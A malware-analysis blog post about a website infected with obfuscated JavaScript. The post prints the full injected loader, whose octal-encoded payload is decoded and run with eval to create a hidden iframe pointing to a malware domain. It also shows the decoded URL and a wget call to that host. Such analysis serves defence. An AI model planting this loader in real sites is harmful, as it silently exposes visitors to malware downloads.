Website infected with malicious obfuscated JavaScript that injects iframes pointing to malware domain
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.
This compromised website has suspicious JavaScript code injected in 30 files. Malware was found on this website's pages by Google Safe Browsing including trojans and it is hosted on two domains. It already infected 1 domain.
Quttera website malware scanner detected hidden iframes that load content from one of this malware domains ( http:// www.pufuqa.toh.info ). This post describes how it is done.
This compromised website has suspicious JavaScript code injected in 30 files. Malware was found on this website's pages by Google Safe Browsing including trojans and it is hosted on two domains. It already infected 1 domain.
Quttera website malware scanner detected hidden iframes that load content from one of this malware domains ( http:// www.pufuqa.toh.info ). This post describes how it is done.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Thu Aug 8 04:42:49 2013
Infected website's files: 30
Quttera website malware scanner screenshot |
Threat dump:
Malware entry details
Beautified script
- ps = "sp" + "li" + "t";
- asd = function () {
- d.body++
- };
- a =("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,145,62,170,163,154,62,155,162,152,163,63,163,164,151,162,167,170,145,170,63,145,164,164,166,163,164,166,155,145,170,151,63,146,163,171,162,150,61,167,155,150,151,61,160,163,145,150,143,163,150,150,167,62,164,154,164,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,145,62,170,163,154,62,155,162,152,163,63,163,164,151,162,167,170,145,170,63,145,164,164,166,163,164,166,155,145,170,151,63,146,163,171,162,150,61,167,155,150,151,61,160,163,145,150,143,163,150,150,167,62,164,154,164,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));
- ss = String;
- d = document;
- for (i = 0; i < a.length; i += 1) {
- a[i] = -(10 - 6) + parseInt(a[i], 8);
- }
- try {
- asd()
- } catch (q) {
- zz = 5 - 5;
- }
- try {
- zz /= 2
- } catch (q) {
- zz = 1;
- }
- if (!zz) eval(ss["fromCharCode"].apply(ss, a));
Similar malware analyzed in the obfuscated malicious JavaScripts category on our blog.
Malicious payload
Decoded payload generates hidden iframe to http:// www.pufuqa.toh.info/openstat/appropriate/bound-side-load_odds.php
Wget returns nothing at the time this article is written:
>wget http://www.pufuqa.toh.info/openstat/appropriate/bound-side-load_odds.php
--2013-08-13 17:48:57-- http://www.pufuqa.toh.info/openstat/appropriate/bound-side-load_odds.php
▒▒▒▒▒▒▒▒▒▒▒▒ www.pufuqa.toh.info (www.pufuqa.toh.info)... ▒▒▒▒: hostname nor servname provided, or not known.
wget: unable to resolve host address <<www.pufuqa.toh.info>>
Blacklisting status
Blacklisted by Google Safe Browsing
Google Blacklisted. |
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment